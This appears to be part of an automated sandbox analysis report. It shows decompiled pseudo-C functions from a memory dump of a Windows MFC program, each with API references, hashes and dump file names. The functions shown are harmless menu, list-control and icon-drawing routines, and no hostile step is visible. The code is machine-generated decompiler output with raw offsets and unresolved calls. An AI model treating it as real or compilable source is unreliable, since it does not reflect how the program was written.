Download Yara Rule

C-Code - Quality: 96%

			E004015CD(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t53;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				void* _t76;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t76 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42f394;
				 *(_t76 - 4) = 9;
				L004020EA();
				_t59 = __ecx + 0x80;
				 *((intOrPtr*)(_t76 - 0x10)) = _t59;
				 *_t59 = 0x42c514;
				 *(_t76 - 4) = 0xa;
				L00425FA6();
				_t60 = __ecx + 0x78;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *((intOrPtr*)(_t76 - 0x10)) = _t60;
				 *_t60 = 0x42c514;
				 *(_t76 - 4) = 0xb;
				L00425FA6();
				_t61 = __ecx + 0x70;
				 *((intOrPtr*)(_t76 - 0x10)) = _t61;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t61 = 0x42c514;
				 *(_t76 - 4) = 0xc;
				L00425FA6();
				_t62 = __ecx + 0x68;
				 *((intOrPtr*)(_t76 - 0x10)) = _t62;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t62 = 0x42c514;
				 *(_t76 - 4) = 0xd;
				L00425FA6();
				_t63 = __ecx + 0x60;
				 *((intOrPtr*)(_t76 - 0x10)) = _t63;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t63 = 0x42c514;
				 *(_t76 - 4) = 0xe;
				L00425FA6();
				_t64 = __ecx + 0x58;
				 *((intOrPtr*)(_t76 - 0x10)) = _t64;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t64 = 0x42c514;
				 *(_t76 - 4) = 0xf;
				L00425FA6();
				_t65 = __ecx + 0x50;
				 *((intOrPtr*)(_t76 - 0x10)) = _t65;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t65 = 0x42c514;
				 *(_t76 - 4) = 0x10;
				L00425FA6();
				_t66 = __ecx + 0x48;
				 *((intOrPtr*)(_t76 - 0x10)) = _t66;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t66 = 0x42c514;
				 *(_t76 - 4) = 0x11;
				L00425FA6();
				_t67 = __ecx + 0x40;
				 *((intOrPtr*)(_t76 - 0x10)) = _t67;
				 *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x10)))) = 0x42c4fc;
				 *_t67 = 0x42c514;
				 *(_t76 - 4) = 0x12;
				L00425FA6();
				_t53 =  *((intOrPtr*)(_t76 - 0x10));
				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
				 *_t53 = 0x42c4fc;
				L004268D0();
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t53;
			}

APIs

_EH_prolog.MSVCRT ref: 0042182C
#2414.MFC42 ref: 00421867
#2414.MFC42 ref: 00421882
#2414.MFC42 ref: 00421898
#2414.MFC42 ref: 004218AE
#2414.MFC42 ref: 004218C4
#2414.MFC42 ref: 004218DA
#2414.MFC42 ref: 004218F0
#2414.MFC42 ref: 00421906
#2414.MFC42 ref: 0042191C
#818.MFC42 ref: 0042192C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414$#818H_prolog
String ID:
API String ID: 4159539385-0
Opcode ID: 795860b917f2564519edf6b1ca6858e813744744ed46d6a80c63f7106b78d19b
Instruction ID: 908b4c71e5388689c6bfed8af60c81a0ab2b10f517d3962cc341cfac6398f475
Opcode Fuzzy Hash: 795860b917f2564519edf6b1ca6858e813744744ed46d6a80c63f7106b78d19b
Instruction Fuzzy Hash: D5416C70E0026ACFCB05DFA9D5806ADBBF4FF59308F50009EE414AB352D7B45A05CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00409180, Relevance: 16.6, APIs: 11, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00409180(intOrPtr __ecx) {
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				long _t56;
				void* _t70;
				intOrPtr _t74;
				void* _t77;

				L004269E6();
				_t74 = __ecx;
				 *((intOrPtr*)(_t77 - 0x10)) = __ecx;
				 *(_t77 - 4) = 2;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( *((intOrPtr*)(_t77 + 8)));
				_push(0);
				_t70 = 3;
				_push(_t70);
				L00426072();
				_t44 =  *((intOrPtr*)(_t77 + 0xc));
				 *(_t77 - 0x38) = _t70;
				 *((intOrPtr*)(_t77 - 0x34)) = 0;
				 *((intOrPtr*)(_t77 - 0x30)) = 1;
				_push( *((intOrPtr*)(_t44 - 8)));
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t77 - 0x24)) = _t44;
				L00426018();
				 *((intOrPtr*)(_t77 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0xc)) - 8));
				_t47 =  *((intOrPtr*)(_t77 + 0x10));
				if(_t47 != 0xffffffff) {
					 *(_t77 - 0x1c) = _t47 + 3;
				} else {
					 *(_t77 - 0x1c) = 2;
				}
				SendMessageA( *(_t74 + 0x20), 0x1006, 0, _t77 - 0x38);
				_t51 =  *((intOrPtr*)(_t77 + 0x14));
				 *(_t77 - 0x60) = 3;
				 *((intOrPtr*)(_t77 - 0x5c)) = 0;
				 *(_t77 - 0x58) = 2;
				_push( *((intOrPtr*)(_t51 - 8)));
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t77 - 0x4c)) = _t51;
				L00426018();
				 *((intOrPtr*)(_t77 - 0x44)) = 1;
				 *((intOrPtr*)(_t77 - 0x48)) =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0x14)) - 8));
				_t56 = SendMessageA( *( *((intOrPtr*)(_t77 - 0x10)) + 0x20), 0x1006, 0, _t77 - 0x60);
				 *(_t77 - 4) = 1;
				L00425DFC();
				 *(_t77 - 4) = 0;
				L00425DFC();
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t56;
			}

APIs

_EH_prolog.MSVCRT ref: 00409185
#3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 004091AA
#2915.MFC42(?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 004091C5
#5572.MFC42(000000FF,?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 004091D2
SendMessageA.USER32 ref: 0040920B
#2915.MFC42(?), ref: 00409227
#5572.MFC42(000000FF,?), ref: 00409234
SendMessageA.USER32 ref: 00409255
#800.MFC42 ref: 0040925E
#800.MFC42 ref: 00409269
#800.MFC42 ref: 00409275

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2915#5572MessageSend$#3998H_prolog
String ID:
API String ID: 1290623193-0
Opcode ID: 2c9b6ea4ca1387c8e61ed7c7ac9a04c72d0623f9ebb02f34ca7605296d241a81
Instruction ID: 908d7d1158ec3114bcfa012924ea44d9702cf4be20c280d710239196cf52f9af
Opcode Fuzzy Hash: 2c9b6ea4ca1387c8e61ed7c7ac9a04c72d0623f9ebb02f34ca7605296d241a81
Instruction Fuzzy Hash: CE315BB090021CAFDB00DF95D989ADEBBB8FF08328F50415AF825A72A1D7B49E04DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041467B, Relevance: 15.1, APIs: 10, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041467B(signed int __ebx, intOrPtr __ecx, void* __fp0) {
				signed char _t59;
				signed int _t62;
				int _t64;
				int _t65;
				signed int _t78;
				char _t79;
				signed int _t82;
				int _t87;
				intOrPtr* _t90;
				char _t101;
				intOrPtr _t103;
				CHAR* _t106;
				int _t107;
				void* _t109;
				void* _t120;

				_t120 = __fp0;
				_t78 = __ebx;
				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t106 = 0;
				_t103 = __ecx;
				if( *(_t109 + 0x10) != 0) {
					__eflags =  *(_t109 + 0xc) & 0x00000100;
					if(( *(_t109 + 0xc) & 0x00000100) == 0) {
						_t7 = _t109 + 0xc;
						 *_t7 =  *(_t109 + 0xc) | 0x00000100;
						__eflags =  *_t7;
					}
					_t59 =  *(_t109 + 0xc);
				} else {
					_t59 =  *(_t109 + 0xc) & 0x00000400 | 0x00000009;
					 *(_t109 + 0xc) = _t59;
				}
				if((_t59 & 0x00000010) != 0) {
					_push( *(_t109 + 0x10));
					_push( *0x4421a0);
					L00426582();
					_push( *(_t109 + 0x10));
					_t59 =  *(_t103 + 0x24);
					_push(_t59);
					L00426582();
				}
				_push(0x24);
				L00425E38();
				 *(_t109 - 0x10) = _t59;
				 *(_t109 - 4) = _t106;
				if(_t59 != _t106) {
					_t106 = L00401D7F(_t59);
				}
				_push(_t78);
				_t79 = _t78 | 0xffffffff;
				_push(_t106);
				_push( *((intOrPtr*)(_t103 + 0x10)));
				 *(_t109 - 4) = _t79;
				L00426582();
				L004013DE(_t106,  *(_t109 + 8));
				_t101 = 0;
				_t106[0xc] = _t79;
				_t106[4] = _t79;
				if( *(_t109 + 0x14) < 0) {
					_t62 =  *0x4421b8;
					 *(_t109 + 0x14) = _t79;
					__eflags = _t62;
					if(__eflags > 0) {
						_t90 =  *0x4421b4;
						while(1) {
							__eflags =  *_t90 -  *(_t109 + 0x10);
							if(__eflags == 0) {
								break;
							}
							_t101 = _t101 + 1;
							_t90 = _t90 + 4;
							__eflags = _t101 - _t62;
							if(__eflags < 0) {
								continue;
							} else {
							}
							goto L21;
						}
						 *(_t109 + 0x14) = _t101;
					}
					L21:
					_t106[8] =  *(_t109 + 0x14);
				} else {
					L00425F8E();
					_t82 = 1;
					 *(_t109 + 8) =  *(_t109 + 8) & 0x00000000;
					_push(_t109 + 8);
					_push( *(_t109 + 0x14));
					 *(_t109 - 4) = _t82;
					_push( *(_t109 + 0x10));
					E00401FBE();
					if(_t106[0x1c] != 0) {
						L004266BA();
						_t106[0x1c] = _t106[0x1c] & 0x00000000;
					}
					_push(_t82);
					_push(_t82);
					_push(0xff);
					_push( *0x440d0c);
					_push( *0x440d08);
					L00426000();
					if(E00401140(_t103, _t120, _t109 - 0x14,  *(_t109 + 0x14)) != 0) {
						_push( *(_t109 + 0x10));
						_push( *(_t109 + 8));
						_push(_t109 - 0x14);
						_t106[8] = L00401294(_t103);
					}
					 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
					L00425FB2();
				}
				_t87 =  *(_t109 + 0x10);
				_t64 =  *(_t109 + 0xc);
				_t106[0x10] = _t64;
				_t106[0x14] = _t87;
				_t65 = AppendMenuA( *(_t103 + 4), _t64, _t87, _t106);
				_t119 =  *((intOrPtr*)(_t103 + 0x50));
				_t107 = _t65;
				if( *((intOrPtr*)(_t103 + 0x50)) != 0) {
					E00401456(_t103, _t119);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return _t107;
			}

APIs

_EH_prolog.MSVCRT ref: 00414680
#5860.MFC42(?,?), ref: 004146C4
#5860.MFC42(?,?,?,?), ref: 004146D3
#823.MFC42(00000024), ref: 004146DA
#5860.MFC42(?,00000000), ref: 00414702
#384.MFC42(?,?,00000000), ref: 00414725
#2408.MFC42(?,?,00000000), ref: 0041474C
#2096.MFC42(000000FF,00000001,00000001,?,?,00000000), ref: 0041476B
#686.MFC42(000000FF,00000001,00000001,?,?,00000000), ref: 0041479D
AppendMenuA.USER32 ref: 004147E2

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5860$#2096#2408#384#686#823AppendH_prologMenu
String ID:
API String ID: 2741775810-0
Opcode ID: adb4448f827b1fd95db0a44adc16dfe987616fa4bd6aa43f07ce7e877c148775
Instruction ID: 60ea6cd9b20205eab0a6ca5c541bc258371245790efc30f4de00da3725f9e180
Opcode Fuzzy Hash: adb4448f827b1fd95db0a44adc16dfe987616fa4bd6aa43f07ce7e877c148775
Instruction Fuzzy Hash: D651B37460020AAFCB14DF65D941AEE77B5FF44318F10852EF926A7290D738DE50CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040101E, Relevance: 15.1, APIs: 10, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040101E() {
				struct HICON__** _t44;
				struct HDC__* _t66;
				struct HDC__* _t75;
				void* _t77;

				L004269E6();
				_t75 =  *(_t77 + 8);
				_push( *((intOrPtr*)(_t75 + 0x18)));
				L00425FD0();
				 *(_t77 + 8) = E00429A7A;
				if(( *(_t75 + 0x10) & 0x00000001) != 0 && ( *(_t75 + 0xc) & 0x00000003) != 0) {
					_push(GetSysColor(0xd));
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x14) &  *(_t77 - 0x10));
					 *(_t77 - 0x14) = 0x42c514;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					L00425FA6();
					 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				}
				if(( *(_t75 + 0x10) & 0x00000001) == 0 && ( *(_t75 + 0xc) & 0x00000002) != 0) {
					_push(0xffffff);
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x1c) &  *(_t77 - 0x18));
					 *(_t77 - 0x1c) = 0x42c514;
					 *(_t77 - 4) = 1;
					L00425FA6();
				}
				_t44 =  *(_t75 + 0x2c);
				if(_t44 != 0 && _t44 != 0xffffffff) {
					_t66 =  *(_t77 + 8);
					if(_t66 != 0) {
						_t66 =  *(_t66 + 4);
					}
					_t44 = DrawIconEx(_t66,  *(_t75 + 0x1c) + 1,  *((intOrPtr*)(_t75 + 0x20)) + 1,  *_t44, 0x20, 0x20, 0, 0, 3);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t44;
			}

APIs

_EH_prolog.MSVCRT ref: 0041DA2C
#2859.MFC42(?), ref: 0041DA3D
GetSysColor.USER32(0000000D), ref: 0041DA5E
#283.MFC42(00000000), ref: 0041DA68
FillRect.USER32 ref: 0041DA82
#2414.MFC42 ref: 0041DA8E
#283.MFC42(00FFFFFF,?), ref: 0041DAAB
FillRect.USER32 ref: 0041DAC5
#2414.MFC42 ref: 0041DAD4
DrawIconEx.USER32 ref: 0041DB06

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#283FillRect$#2859ColorDrawH_prologIcon
String ID:
API String ID: 1359844443-0
Opcode ID: 3ef96bd81a55d4b4a2c5f4b55e89dae9afd977eac29cbb503ba0a2493fdc7985
Instruction ID: d8ac52898c7c74e377922789c36638744392d87304fffd9b92a9b23d74f8a08a
Opcode Fuzzy Hash: 3ef96bd81a55d4b4a2c5f4b55e89dae9afd977eac29cbb503ba0a2493fdc7985
Instruction Fuzzy Hash: 5A317E71A00609AFCB21DFA4C946FEEBBB8EF44304F14821AA516972D1D778AA49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040141F, Relevance: 15.1, APIs: 10, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040141F() {
				struct HICON__** _t44;
				struct HDC__* _t66;
				struct HDC__* _t75;
				void* _t77;

				L004269E6();
				_t75 =  *(_t77 + 8);
				_push( *((intOrPtr*)(_t75 + 0x18)));
				L00425FD0();
				 *(_t77 + 8) = E00429A60;
				if(( *(_t75 + 0x10) & 0x00000001) != 0 && ( *(_t75 + 0xc) & 0x00000003) != 0) {
					_push(GetSysColor(0xd));
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x14) &  *(_t77 - 0x10));
					 *(_t77 - 0x14) = 0x42c514;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					L00425FA6();
					 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				}
				if(( *(_t75 + 0x10) & 0x00000001) == 0 && ( *(_t75 + 0xc) & 0x00000002) != 0) {
					_push(0xffffff);
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x1c) &  *(_t77 - 0x18));
					 *(_t77 - 0x1c) = 0x42c514;
					 *(_t77 - 4) = 1;
					L00425FA6();
				}
				_t44 =  *(_t75 + 0x2c);
				if(_t44 != 0 && _t44 != 0xffffffff) {
					_t66 =  *(_t77 + 8);
					if(_t66 != 0) {
						_t66 =  *(_t66 + 4);
					}
					_t44 = DrawIconEx(_t66,  *(_t75 + 0x1c) + 1,  *((intOrPtr*)(_t75 + 0x20)) + 1,  *_t44, 0x10, 0x10, 0, 0, 3);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t44;
			}

APIs

_EH_prolog.MSVCRT ref: 0041D7C2
#2859.MFC42(?), ref: 0041D7D3
GetSysColor.USER32(0000000D), ref: 0041D7F4
#283.MFC42(00000000), ref: 0041D7FE
FillRect.USER32 ref: 0041D818
#2414.MFC42 ref: 0041D824
#283.MFC42(00FFFFFF,?), ref: 0041D841
FillRect.USER32 ref: 0041D85B
#2414.MFC42 ref: 0041D86A
DrawIconEx.USER32 ref: 0041D89C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#283FillRect$#2859ColorDrawH_prologIcon
String ID:
API String ID: 1359844443-0
Opcode ID: c6044c1eec2a46b41084b7a84f1abfe6910a235e4cc170e8048633cfdac6ed69
Instruction ID: ab45d820cc92480ee3b57cba2a17c5d307e4882e536670a6e08578ace0ca36d5
Opcode Fuzzy Hash: c6044c1eec2a46b41084b7a84f1abfe6910a235e4cc170e8048633cfdac6ed69
Instruction Fuzzy Hash: 2131B071A00208AFC720DF65C946FEABBB4AF04304F14862AA526932D1D778EA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040134D, Relevance: 15.1, APIs: 10, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040134D(void* __ecx) {
				CHAR* _t18;
				struct HMENU__* _t20;
				int _t22;
				void* _t33;
				struct HMENU__* _t36;
				void* _t39;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t33 = __ecx;
				_t18 = GetMenuItemCount( *(__ecx + 4));
				 *(_t39 - 0x14) = _t18;
				L00425E08();
				_t22 = 0;
				 *(_t39 - 4) = 0;
				if( *(_t39 - 0x14) <= 0) {
					L5:
					_t36 = 0;
				} else {
					while(1) {
						L0042601E();
						_t18 = GetMenuStringA( *(_t33 + 4), _t22, _t18, 0x100, 0x100);
						L00426018();
						__imp___mbscmp( *((intOrPtr*)(_t39 - 0x10)),  *((intOrPtr*)(_t39 + 8)), 0xffffffff, 0x400);
						if(_t18 == 0) {
							break;
						}
						_t22 = _t22 + 1;
						if(_t22 <  *(_t39 - 0x14)) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t20 = GetSubMenu( *(_t33 + 4), _t22);
					_push(_t20);
					L0042635A();
					_t36 = _t20;
				}
				L6:
				 *(_t39 - 4) =  *(_t39 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t39 - 0xc));
				return _t36;
			}

APIs

_EH_prolog.MSVCRT ref: 0041881F
GetMenuItemCount.USER32 ref: 0041882E
#540.MFC42 ref: 0041883A
#2915.MFC42(00000100,00000100,00000400), ref: 00418858
GetMenuStringA.USER32(?,00000000,00000000,00000100,00000100), ref: 00418862
#5572.MFC42(000000FF), ref: 0041886D
_mbscmp.MSVCRT ref: 00418878
#800.MFC42(00000000), ref: 00418893
GetSubMenu.USER32 ref: 004188AF
#2863.MFC42(00000000), ref: 004188B6

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2863#2915#540#5572#800CountH_prologItemString_mbscmp
String ID:
API String ID: 999429702-0
Opcode ID: 656e55db0a4d7ed9a7694a65d957f9bf37dfe0cd3d7185d01875cf39855b80a8
Instruction ID: d09d6cd3e564bc30811780547d513705d2741ff88b998f2c9328fc9034769300
Opcode Fuzzy Hash: 656e55db0a4d7ed9a7694a65d957f9bf37dfe0cd3d7185d01875cf39855b80a8
Instruction Fuzzy Hash: 491191B5A00126AFCB04EFA1DD469EEF738FF05364B60413EF126A21A1DB345E05DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040908A, Relevance: 15.0, APIs: 10, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040908A(void* __eax) {
				void* _t28;
				void* _t45;

				_t28 = __eax;
				 *(_t45 - 4) = 7;
				if( *((intOrPtr*)(_t45 - 0x38)) == 0) {
					_push(0x805d);
					L00425E02();
					_push( *0x44214c);
					_t28 = _t45 - 0x14;
					_push( *((intOrPtr*)(_t45 - 0x18)));
					_push(_t28);
					L00425FDC();
					_push(0);
					_push(0x10);
					_push( *((intOrPtr*)(_t45 - 0x14)));
					L00426030();
				} else {
					L00426036();
				}
				 *(_t45 - 4) = 0xe;
				L00425DFC();
				 *(_t45 - 4) = 6;
				L0042602A();
				 *(_t45 - 4) = 5;
				L00425DFC();
				 *(_t45 - 4) = 4;
				L00425DFC();
				 *(_t45 - 4) = 3;
				L00425DFC();
				 *(_t45 - 4) = 2;
				L00425DFC();
				 *(_t45 - 4) = 1;
				L00425DFC();
				 *(_t45 - 4) = 0;
				L00425DFC();
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L00426024();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t28;
			}

0x0040908a
0x0040908f
0x00409096
0x004090a2
0x004090aa
0x004090af
0x004090b5
0x004090b8
0x004090bb
0x004090bc
0x004090c4
0x004090c5
0x004090c7
0x004090ca
0x00409098
0x0040909b
0x0040909b
0x004090d5
0x004090d9
0x004090e4
0x004090e8
0x004090f0
0x004090f4
0x004090fc
0x00409100
0x00409108
0x0040910c
0x00409114
0x00409118
0x00409120
0x00409124
0x0040912c
0x0040912f
0x00409134
0x0040913b
0x00409145
0x0040914e

APIs

#1997.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040909B
#4160.MFC42(0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090AA
#2818.MFC42(?,?,0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090BC
#1200.MFC42(?,00000010,00000000), ref: 004090CA
